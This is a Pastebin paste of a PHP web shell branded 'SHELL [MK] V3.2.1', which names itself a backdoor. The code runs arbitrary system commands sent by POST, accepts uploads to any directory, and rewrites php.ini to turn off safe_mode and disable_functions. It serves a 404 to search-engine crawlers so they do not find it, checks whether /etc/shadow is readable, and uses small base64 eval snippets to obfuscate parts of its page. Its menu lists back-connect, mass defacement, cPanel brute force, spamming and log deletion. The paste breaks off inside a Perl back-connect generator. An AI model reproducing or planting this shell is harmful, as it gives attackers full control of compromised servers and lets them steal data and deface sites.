MisterKlio

SHELL [MK] VERSION 3.2.1

Nov 2nd, 2016
233
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 459.25 KB | None | 0 0
  1. <?
  2. //////////              
  3. /////////   SHELL [MK] VERSION 3.2.1
  4. ////////    CREATED BY © MISTER KLIO
  5. ///////      ____     ____   __   __  
  6. //////      (    )   (    ) (  ) /  )
  7. /////       (  \  \_/  /  ) |  |/  /
  8. ////        (  )\  M  /(  ) |  K  (
  9. ///         (  ) \_  / (  ) |  |\  \
  10. //    SH3LL (__)       (__) (__) \__) V3.2
  11. /*                                 */// [ AZEDINEKYO@GMAIL.COM ] - [ FACEBOOK @LOGOUT.MA ]
  12. echo "<title>[MK] V3.2.0 | CONTROLE UR SERVER ".$_SERVER['HTTP_HOST']."</title>";
  13. ////////// REPORTING
  14. error_reporting(5);
  15. @ignore_user_abort(TRUE);
  16. @set_magic_quotes_runtime(0);
  17. ////////// SET TIME
  18. @set_time_limit(0);
  19. /////  HTTP_USER_AGENT
  20. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  21. $USERAGENTS = array("Twitter","Bing", "Yahoo", "Facebook", "Google", "MisterKlio","Yandex");
  22. if(preg_match('/MK/' . implode('|', $USERAGENTS) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  23. header('HTTP/1.0 404 NOT FOUND');
  24. exit; } }
  25. ///// DIR
  26. $Mister = $_POST['Mister']; $pwd = $_POST['pwd']; $DIR = $_POST['DIR'];
  27. if ($DIR == ''){ $DIR = getcwd(); }
  28. ///// PHP.INI
  29. if ($Mister == 'ini'){ $fp = fopen("php.ini","w+");
  30. fwrite($fp,"
  31. safe_mode = Off
  32. Safe_mode_gid = Off
  33. disable_functions = None
  34. disable_classes = None
  35. safe_mode_gid = Off
  36. open_basedir = Off
  37. allow_url_fopen = On
  38. "); }
  39. //////// PERMISSIONS  
  40. function getFilePermissions($FILE)
  41. { $perms = fileperms($FILE);
  42. if (($perms & 0xC000) == 0xC000) {
  43. //////// SOCKET
  44.  $info = 's';
  45. } elseif (($perms & 0xA000) == 0xA000) {
  46. ////////  SYMBOLIC LINK
  47.     $info = 'l';
  48. } elseif (($perms & 0x8000) == 0x8000) {
  49. ////////  REGULAR
  50.     $info = '-';
  51. } elseif (($perms & 0x6000) == 0x6000) {
  52. //////// BLOCK SPECIAL
  53.     $info = 'b';
  54. } elseif (($perms & 0x4000) == 0x4000) {
  55. //////// DIRECTORY
  56.     $info = 'd';
  57. } elseif (($perms & 0x2000) == 0x2000) {
  58. //////// CHARACTER SPECIAL
  59.     $info = 'c';
  60. } elseif (($perms & 0x1000) == 0x1000) {
  61. //////// FIFO PIPE
  62.     $info = 'p';
  63. } else {
  64. //////// UNKNOWN
  65.     $info = "u"; }
  66. //////// OWNER
  67. $info .= (($perms & 0x0100) ? 'r' : '-');
  68. $info .= (($perms & 0x0080) ? 'w' : '-');
  69. $info .= (($perms & 0x0040) ?
  70.             (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
  71. //////// GROUP
  72. $info .= (($perms & 0x0020) ? 'r' : '-');
  73. $info .= (($perms & 0x0010) ? 'w' : '-');
  74. $info .= (($perms & 0x0008) ?
  75.             (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
  76. //////// WORLD
  77. $info .= (($perms & 0x0004) ? 'r' : '-');
  78. $info .= (($perms & 0x0002) ? 'w' : '-');
  79. $info .= (($perms & 0x0001) ?
  80.  (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
  81.  
  82.  return $info;}
  83.  
  84. ///// UP
  85. if (!empty ($_FILES['MKUP'])){
  86.     MOVE_UPLOADED_FILE($_FILES['MKUP']['tmp_name'],$DIR.'/'.$_FILES['MKUP']['name']);
  87.     $MK_TEXT = "<span style=' color:#0078FF;'><b>UPLOADED SUCCESSFULLY</b></span><br>FILE name : ".$_FILES['MKUP']['name']."<br>FILE SIZE : ".$_FILES['MKUP']['size']."<br>FILE TYPE : ".$_FILES['MKUP']['type']."<br>";}
  88. ///////// SECOND(S)
  89. $TIME = explode(' ', microtime());
  90. $startime = $TIME[1] + $TIME[0];
  91. function debuginfo() {
  92. global $startime;
  93. $TIME = explode(' ', microtime());
  94. $TOTALTIME = number_format(($TIME[1] + $TIME[0] - $startime), 2);
  95. echo ''.$TOTALTIME.' SECOND(S)';}
  96. ///// COMMAND
  97. function EXMISTER_K() {
  98.     $in=$_POST['COMMAND'];
  99. if (!$in == '') {
  100.     $MKOUT = '';
  101. if (function_exists('exec')) {
  102.         @exec($in,$MKOUT);
  103.         $MKOUT = @join("\n",$MKOUT);
  104. } elseif (function_exists('passthru')) {
  105.         ob_start();
  106.         @passthru($in);
  107.         $MKOUT = ob_get_clean();
  108. } elseif (function_exists('system')) {
  109.         ob_start();
  110.         @system($in);
  111.         $MKOUT = ob_get_clean();
  112. } elseif (function_exists('shell_exec')) {
  113.         $MKOUT = shell_exec($in);
  114. } elseif (is_resource($f = @popen($in,"r"))) {
  115.         $MKOUT = "";
  116. while(!@feof($f))
  117.             $MKOUT .= fread($f,1024);
  118.         pclose($f);}
  119. echo $MKOUT;}}
  120. function HIDMISTER_K () {
  121. //////// HOME
  122. echo "<!DOCTYPE html><html><head><title>[MK] V3.2 | CONTROLE UR WEBSITE ".$_SERVER['HTTP_HOST']."</title><meta charset='utf-8'> <meta name='robots' content='noindex, nofollow, noarchive'>";
  123. echo "<link rel='SHORTCUT ICON' href=''>";
  124. $META = base64_decode("PG1ldGEgY29udGVudD0nU0hFTEwgW01LXSBDUkVBVEVEIEFORCBERVZMT1BFRCBCWSBNSVNURVIgS0xJTyBZT1VUVUJFUiAsIEtJTExFUiBIVE1MNSwgSkFWQVNDUklQVCwgQ1NTICwgSlMgLCBBRE9CRSBQSE9UT1NIT1AgTE9HSUNJRUwsIE1BVEVSSUVMIElORk9STUFUSVFVRSBFVCBQUk9HUkFNTUFUSU9OIElORk9STUFUSVFVRSAjTUFERSBJTiBNT1JPQ0NPJyBuYW1lPSdkZXNjcmlwdGlvbic+/"); echo "". $META ."";
  125. $META1 = '<meta content="en" name="language">';
  126. echo ''. $META1 .'';
  127. $META2 = '<meta name="keywords" content="[MK] V3.1">';
  128. echo ''. $META2 .'';
  129. $META3 = '<meta name="keywords" content="Shell MK">';
  130. echo ''. $META3 .'';
  131. $META4 = '<meta name="keywords" content="Mister Klio">';
  132. echo ''. $META4 .'';
  133. $META5 = '<meta name="keywords" content="Shell">';
  134. echo ''. $META5 .'';
  135. $CHARSET1 = "<meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'>";
  136. echo ''. $CHARSET1.'';
  137.  
  138. ?>
  139.  
  140. <style type="text/css">@font-face{font-family:'Freight Sans';font-style:normal;font-weight:normal;src:url(data:font/truetype;base64,)}@font-face{font-family:'Freight Sans Bold';font-style:normal;font-weight:bold;src:url(data:font/truetype;base64,)}.bf{font-family:'Freight Sans', helvetica, arial, sans-serif !important;font-weight:normal !important;}.bu{font-family:'Freight Sans Bold', helvetica, arial, sans-serif !important;font-weight:bold !important;}</style>
  141. <style media='screen'  rel='stylesheet' type='text/css'>
  142. body{background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);padding:1px 1px;font-family: 'Freight Sans Bold', Tahoma, sans-serif;color:#0078FF;font-size:9px;font-weight: normal;font-style: normal;}a  {text-decoration:none;font-size:9px;font-family: 'Freight Sans Bold', Tahoma, sans-serif;color:#FFFFFF;} a:hover {text-decoration:none;color:#0078FF;}span ,font,b , button{font-size:9px;font-family: 'Freight Sans Bold', Tahoma, sans-serif;}li ,ul{font-size:9px;font-family: 'Freight Sans Bold', Tahoma, sans-serif;margin:0;padding:0;}ul.Mister-hmenu li {display: block;float: left; padding:0 2px;}ul.Mister-hmenu li a {background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;padding:0 15px;margin:0 auto;position:relative;display:block;height:25px;cursor: pointer;color:#FFFFFF;line-height:24px;text-align: center;-webkit-border-radius:6px;}ul.Mister-hmenu>li>a.active{background: -webkit-linear-gradient(top, #4382EF 0, #1463EB 33%, #0C3B8D 100%) no-repeat;padding:0 20px;}ul.Mister-hmenu>li>a:hover {color:#000000;background: -webkit-linear-gradient(top, #FFFFFF 0, #BFBFBF 100%) no-repeat;}.Mister-button{border-top: 2px solid #0078FF; font-size:9px;font-family: 'Freight Sans Bold', Tahoma, sans-serif;text-align: center;color: #FFFFFF; height:18px;border:1px solid rgba(0,0,0, 0.2);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;border-radius:5px;border-bottom:3px solid #0078FF;} input.Mister-button ,button.Mister-button{background: -webkit-linear-gradient(top, #4382EF 0, #1463EB 33%, #0C3B8D 100%) no-repeat;}.Mister-button.active:hover {border-bottom:2px solid #000000;color: #FFFFFF !important;}.Mister-button.hover, .Mister-button:hover{ border-bottom:2px solid #000000;background: -webkit-linear-gradient(top, #FFFFFF 0, #BFBFBF 100%) no-repeat;} .Mister-button.hover, .Mister-button:hover {color: #000000 !important;} input[type='text'], input[type='password'], input[type='email'], input[type='url'], input[type='text'], input[type='password'], input[type='email'], input[type='url'], textarea {border:1px solid #4D4D4D;-webkit-border-radius:9px;width:100%; padding:3px;color:#0078FF;background:-webkit-linear-gradient(top, #000000 0, #404040 100%) no-repeat; font-family: 'Freight Sans Bold', Tahoma, sans-serif; font-size:9px;-moz-border-radius:9px;}table ,area {    outline:none;    transition: all 0.20s ease-in-out;    -webkit-transition: all 0.25s ease-in-out;    -moz-transition: all 0.25s ease-in-out;    border-radius:3px;    -webkit-border-radius:3px;    -moz-border-radius:3px;    border:1px solid rgba(0,0,0, 0.2);    font-family: 'Freight Sans Bold', Tahoma, sans-serif;}select ,option {font-size:9px;font-family: 'Freight Sans Bold', Tahoma, sans-serif;color:#000000;background: -webkit-linear-gradient(top, #FFFFFF 0, #BFBFBF 100%) no-repeat;border-radius:5px;margin:0 auto;-webkit-border-radius:6px;height:18px;-webkit-box-shadow: inset 0 1px rgba(255, 255, 255, 0.3), inset 0 0 1px 1px rgba(255, 255, 255, 0.1), 0 2px 10px rgba(0, 0, 0, 0.5);}textarea {height:200px; border-radius:9px;-webkit-border-radius:9px;-moz-border-radius:9px;color:#0078FF;background:-webkit-linear-gradient(top, #000000 0, #404040 100%) no-repeat;  font-family: 'Freight Sans Bold', Tahoma, sans-serif; font-size:9px;}input:focus {     border: 2px solid #0078FF;    overflow: auto;    height:19px;}textarea:focus {    box-shadow: 0 0 5px rgba(0, 0, 255, 1);    -webkit-box-shadow: 0 0 5px rgba(0, 0, 255, 1);    -moz-box-shadow: 0 0 5px rgba(0, 0, 255, 1);    border: 2px solid #0078FF;    overflow: auto;    height:200px;}th{height:20px;background: #000000;}tr:hover{background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;}td,th{border-bottom:1px solid #000000;font-size:9px;border-radius:4px; font-family: 'Freight Sans Bold', Tahoma, sans-serif;margin:0;vertical-align:top;color:#e1e1e1; }h1{ border-left:5px solid #0078FF;padding: 2px 5px;font-size:9px;background-color:#222;margin:0px; }div.content{font-size:9px; padding: 4px;margin-left:5px;border-radius:6px;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;border-radius:5px;margin:0 auto;-webkit-border-radius:6px;}.Mister-headline { display:inline-block; position:absolute; min-width:50px;top:12px;left:5.10%;font-size:18px;font-family: 'Freight Sans Bold', Tahoma, sans-serif;color:#0078FF;}.Mister-slogan {font-size:9px;display: inline-block;  position: absolute;  top: 35px;  left: 5.89%;margin-left: -9px;  font-family: 'Freight Sans Bold', Tahoma, sans-serif;color: white ;}.Mister-header{border-radius:5px;border-bottom:2px solid #444444;border-top:3px solid #0078FF; margin:0 auto;background-repeat: no-repeat;height: 60px;
  143. background-image:url();
  144. background-position: center top;position: relative;z-index: auto; }.Mister-nav:after {-webkit-box-shadow: inset 0 1px rgba(255, 255, 255, 0.3), inset 0 0 1px 1px rgba(255, 255, 255, 0.1), 0 2px 10px rgba(0, 0, 0, 0.5);  box-shadow: inset 0 1px rgba(255, 255, 255, 0.3), inset 0 0 1px 1px rgba(255, 255, 255, 0.1), 0 2px 10px rgba(0, 0, 0, 0.5);clear: both;display: block;content: ' '; }.Mister-nav {background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);border-radius:6px;border-top:1px solid black;border-bottom:1px solid black;-webkit-box-shadow:inset 0 1px 0 #6e6e6e,0 2px 2px rgba(0,0,0,0.4);box-shadow:inset 0 1px 0 #6e6e6e,0 2px 2px rgba(0,0,0,0.4)border-bottom:3px solid black;border-top:1px solid black;margin:0 auto;position: relative;z-index: 499; }.dialog {width:100%;}.social {position: fixed;margin-top: 40;}.social ul {-webkit-transform: translate(-270px, 0);}.social ul li {display: block;width: 320px;text-align: right;padding: 5px;-webkit-border-radius: 0 30px 30px 0;-webkit-transition: all 1s;background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);border-bottom:2px solid #000000;}.social ul li:hover {-webkit-transform: translate(110px, 0);background: -webkit-linear-gradient(top, #4382EF 0, #1463EB 33%, #0C3B8D 100%) no-repeat;}.social ul li:hover a {color: #FFFFFF;}.MK-footer {background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;border-radius:6px;border-bottom:1px solid black;-webkit-box-shadow:inset 0 1px 0 #6e6e6e,0 2px 2px rgba(0,0,0,0.4);box-shadow:inset 0 1px 0 #6e6e6e,0 2px 2px rgba(0,0,0,0.4);border-bottom:4px solid #0078FF;font-size:9px;color:#FFFFFF;position:fixed; left:0px; right:0px; bottom:0px; text-align:center; border-top: 1px solid #0078ff; color:#FFFFFF;font-size:9px;}.MK-footer a {color:#0078FF;}.MK-Bouton ,button{color:#FFFFFF;font-size:9px;border: 0;border-collapse: separate;-webkit-background-origin: border ;-moz-background-origin: border ;background-origin: border-box ;background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838);background:linear-gradient(to bottom, #505050, #383838);border-radius:12px;padding:5px;margin:0 auto;height:25px;}
  145. </style>
  146. <?
  147. $LI = "<li>"; $IMGEDITED2 = '<img src="">';
  148. $BODY = '<body onLoad="init()" style="margin:0;table-layout:fixed;">';
  149. echo ''. $BODY .''; $HEADER = "<header class='Mister-header'>";
  150. echo "". $HEADER .""; $NAMES1 = "SHELL [MK] V3.2.0";
  151. $B1 = "<b class='Mister-headline'>"; echo "". $B1 .""; echo "". $NAMES1 ."</b>";
  152. $NAMS2 = "BACKDOR FOR THE NEW GENERATION";
  153. echo "<a class='Mister-slogan'>"; echo "". $NAMS2 ."</a></header>";
  154. $NAV3 = "<nav class='Mister-nav'>"; echo "". $NAV3 ."<div class='Mister-nav-inner'>";
  155. $UL1 = "<ul class='Mister-hmenu'>"; echo "". $UL1 ."<li><a href='?Home' style='background: -webkit-linear-gradient(top, #FFFFFF 0, #BFBFBF 100%) no-repeat;color:#000000;'>";
  156. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  157. $COMMAND = "COMMAND"; echo "". $COMMAND ."</a></li>";
  158. echo "". $LI ."<a href='?Mister=FILES' class='active'>"; $FILEMANAGER = "FILE MANAGER";
  159. echo "". $IMGEDITED2 .""; echo "". $FILEMANAGER ."</a></li>";
  160. echo ''. $LI .'<a href="?Mister=SQLConnect">';
  161. $SQLCONNECT = "SQL CONNECT"; echo''. $SQLCONNECT .'</a></li>';
  162. echo ''. $LI .'<a href="?Mister=BackConnect">';
  163. echo'BACK-CONNECT</a></li>';
  164. echo ''. $LI .'<a href="?Mister=Mass">';
  165. $MASSAUTODEFACER = 'MASS AUTO DEFACER'; echo''. $MASSAUTODEFACER .'</a></li>';
  166. echo ''. $LI .'<a href="?Mister=Zoneh">';
  167. echo'ZONE-H AUTO POSTER</a></li>';
  168. echo ''. $LI .'<a href="?Mister=read">';
  169. echo'READ /ETC/PASSWD</a></li>';
  170. echo ''. $LI .'<a href="?Mister=string">';
  171. echo'STRING TOOLS</a></li>';
  172. echo ''. $LI .'<a href="?Mister=cpanelBrut">';
  173. echo'CPANNELS / BRUTE FORCE</a></li>';
  174. echo ''. $LI .'<a href="?Mister=SYMLINK">';
  175. echo'SYMLINK BYPASS</a></li>';
  176. echo ''. $LI .'<a href="?Mister=Bypassuser">';
  177. echo'ALL BYPASS</a></li>';
  178. echo ''. $LI .'<a href="?Mister=FinderAdmin">';
  179. echo'TOOLS OF HACKING</a></li>';
  180. echo ''. $LI .'<a href="?Mister=Mails">';
  181. echo'TOOLS OF SPAMMING</a></li>';
  182. //// LOGS
  183. echo ''. $LI .'<a href="?Mister=DELLOGS">';
  184. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  185. $LOGS = "DELET LOGS"; echo ''. $LOGS .'</a></li>';
  186. //// END
  187. echo ''. $LI .'<a href="?Mister=infoserv">';
  188. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  189. $SAFEMODES = "SAFE MODES"; echo ''. $SAFEMODES .'</a></li>';
  190. eval("?>".base64_decode("PGxpPjxhIGhyZWY9Jz9NaXN0ZXI9S2lsbGluZyc+PHNwYW4gc3R5bGU9J2ZvbnQtc2l6ZToxM3B4OyBmb250LWZhbWlseTpOYXJraXNpbTsgY29sb3I6I2Y2MDAwMCc+4pyYPC9zcGFuPiBSRU1PVkUgU0hFTEw8L2E+PC9saT4=/"));
  191. echo'</nav><nav class="Mister-nav" cellspacing="3" style="background:-webkit-gradient(linear, left top, left bottom, from(#505050), to(#383838));background:-webkit-linear-gradient(top, #505050, #383838)background:linear-gradient(to bottom, #505050, #383838);background: -webkit-linear-gradient(top, #404040 0, #000000 100%) no-repeat;">';
  192. $TABLE011  = '<table Style="width:100%;" cellspacing=2><td><span style="float:right">'; echo ''. $TABLE011 .'';
  193. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  194. $BNAMESHELL = '<b style="color:#0078FF;"> NAME SHELL : </b>'; echo ''. $BNAMESHELL .'<span style="color:#FFFFFF">SH3LL MK VERSION 3.2.0</span><br>';
  195. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  196. $BALLDRIVE = "<b style='color:#0078FF;'> ALL DRIVERS : </b>"; echo ''. $BALLDRIVE .'<span style="color:#FFFFFF">';
  197. //// DRIVERS
  198. explode("\\",$d);$v = $v[0];
  199. foreach (range("A","Z") as $DRIVERS) {$bool = @IS_DIR($DRIVERS.":\\");
  200. if ($bool){$DRIVER .= "<a href='?Mister=FILES&DIR=".$DRIVERS.":\'>[ ";
  201. if ($DRIVERS.":" != $v){$DRIVER .= $DRIVERS;}
  202. else {$DRIVER .= "<span>".$DRIVERS."</span>";} $DRIVER .= " ]</a> ";}}
  203. echo "". $DRIVER ."</span><br>";
  204. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  205. $WEBSERVER = "<b style='color:#0078FF;'> WEB SERVER : </b>"; echo ''. $WEBSERVER .'<span style="color:#FFFFFF">';
  206. echo $_SERVER["SERVER_SOFTWARE"]; echo '</span><br>';
  207. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  208. $ADMINSERV = "<b style='color:#0078FF;'> ADMIN SERVER : </b>"; echo ''. $ADMINSERV .'<span style="color:#FFFFFF">';
  209. echo $_SERVER['SERVER_ADMIN']; echo '</span><br>';
  210. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  211. $READABLEETC = "<b style='color:#0078FF;'> READABLE /ETC/PASSWD : </b>"; echo ''. $READABLEETC .'';
  212. echo @IS_READABLE('/etc/passwd')?"READABLE <a href='?Mister=read'> [VIEW]</a>":"NOT_READABLE"; echo "<br>";
  213. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  214. $SHADOW = "<b style='color:#0078FF;'> READABLE /ETC/SHADOW : </b>"; echo ''. $SHADOW .'';
  215. echo @IS_READABLE('/etc/shadow')?"READABLE <a href='?Mister=read'> [VIEW]</a>":"NOT_READABLE";
  216. echo '<br></span><span style="right;">';
  217. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  218. $KERNEL = "<b style='color:#0078FF;'> KERNEL : </b>"; echo ''. $KERNEL .'<span style="color:#FFFFFF">';
  219.  echo php_uname(); echo '</span><br>';
  220. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  221. $DRIVEROPEN = "<b style='color:#0078FF;'> DRIVER OPEN : </b>"; echo ''. $DRIVEROPEN .'<span style="color:#FFFFFF">';
  222. if(isset($_GET['path'])){
  223. $DIR = $_GET['path'];
  224. }else{
  225. $DIR = getcwd();
  226. }
  227. $DIR = str_replace('\\','/',$DIR);
  228. $paths = explode('/',$DIR);
  229.  
  230. foreach($paths as $id=>$pwd){
  231. if($pwd == '' && $id == 0){
  232. $a = true;
  233. echo '<a href="?Mister=FILES&DIR=/">/</a>';
  234. continue;
  235. }
  236. if($pwd == '') continue;
  237. echo '<a href="?Mister=FILES&DIR=';
  238. for($i=0;$i<=$id;$i++){
  239. echo "$paths[$i]";
  240. if($i != $id) echo "/";
  241. }
  242. echo '">'.$pwd.'</a>/';
  243. } echo '</span><br>';
  244. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  245. $SYSTEM = "<b style='color:#0078FF;'> SYSTEM : </b>"; echo ''. $SYSTEM .'';
  246. echo "<span style='color:#FFFFFF;'>".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")";echo '</span><br>';
  247. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  248. function formatSizeUnits($bytes){if ($bytes >= 1073741824){$bytes = number_format($bytes / 1073741824, 2) . ' GB';}
  249. elseif ($bytes >= 1048576){$bytes = number_format($bytes / 1048576, 2) . ' MB';}
  250. elseif ($bytes >= 1024){$bytes = number_format($bytes / 1024, 2) . ' KB';}
  251. elseif ($bytes > 1){$bytes = $bytes . ' Bytes';}
  252. elseif ($bytes == 1){$bytes = $bytes . ' Byte';}
  253. else{$bytes = '0 Bytes';}return $bytes;}
  254. $Toplamalan = formatSizeUnits(disk_total_space("/"));
  255. $Freealan = formatSizeUnits(disk_free_space("/"));
  256. $alaNOran = round(disk_free_space("/") * 100 / disk_total_space("/")); echo "<span style='color:#FFFFFF'>";
  257. $TOTAL3 = "<b style='color:#0078FF;'> TOTAL : </span></b>"; echo ''. $TOTAL3 .''; echo "". $Toplamalan ."";
  258. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  259. echo "<span style='color:#FFFFFF'>";
  260. $FREESPACE = "<b style='color:#0078FF;'> FREE : </span></b>"; echo ''. $FREESPACE .''; echo "". $Freealan .""; echo '</span>';
  261. echo '<br>';
  262. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  263. $PORT3 = "<b style='color:#0078FF;'> PORT : </b>"; echo ''. $PORT3 .'<span style="color:#FFFFFF">';
  264. echo $_SERVER['SERVER_PORT'];  echo '</span>';
  265. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  266. $USERID = "<b style='color:#0078FF;'> USER ID : </b>"; echo ''. $USERID .'<span style="color:#FFFFFF">';
  267. echo getmyuid(); echo '</span>';
  268. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  269. $CURRENTUSER = "<b style='color:#0078FF;'> CURRENT USER : </b>"; echo ''. $CURRENTUSER .'<span style="color:#FFFFFF">';
  270. echo get_current_user(); echo '</span><br>';
  271. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  272. $TIMEDATES = "<b style='color:#0078FF;'> TIME & DATE : </b>"; echo ''. $TIMEDATES .'<span style="color:#FFFFFF">';
  273. /// DATE / TIME / DAY
  274. $DATE = date (" F/j/Y/ "); $TIME = date ("g:i A"); $DAY = date ("l");
  275. echo ''. $DATE .''; echo ' | '. $TIME .''; echo ' | '. $DAY .'</span>';
  276. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  277. $LOADING =  "<b style='color:#0078FF;'> LOADING IN : </b>"; echo ''. $LOADING .'<span style="color:#FFFFFF">';
  278. debuginfo();ob_end_flush(); echo "</span></td></tr></table></nav></head>";}
  279. //// COMMAND
  280. function FOTMISTER_K($MK_TEXT,$MK_TEXT1,$DIR) {
  281. echo "</textarea><br><br><form method='POST'>
  282. <center><b>&check; COMMAND : </b><input type='text' name='COMMAND' style='width:40%' value='DIR /s /w /b *config*.php'><input type='submit' class='Mister-button' value='DONE'></center></form>";}
  283. ///// END
  284. //////////////////////////////// TOOLS NOT FOR KIDS  ///////////////////////////////////////
  285. function MISTERMISTER_K () {
  286. $MISTER_K_Mister = $_GET['Mister'];
  287. /////// BACK CONNECT PERL
  288. if ($_GET['Mister'] == 'BackConnect') {
  289. @error_reporting(0);
  290. sleep(2);
  291. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0078FF;'>BACK-CONNECT PERL</span></nav><center>";
  292. ?><br><div class=content>
  293. <form><br>
  294. <span>BACK-CONNECT PERL</span><br/><br>
  295. <span style='color:#FFFFFF;'>SERVER : </span><br>
  296. <input type='text' name='server' value='<? echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); ?>' style='width:20%'> <br>
  297. <span style='color:#FFFFFF;'> PORT:  </span><br>
  298. <input type='text' name='port' value='<? echo $_SERVER['SERVER_PORT']; ?>' style='width:20%'>
  299. </form><br>
  300. <?
  301. echo "<br><span style='color:#FFFFFF;'>SCRIPT BACK-CONNECT PERL EXTRACTED SUCCESSFULLY.... </span>";
  302. //GENERATE BACK-CONNECT SCRIPT PERL
  303. $SCRIPTED = 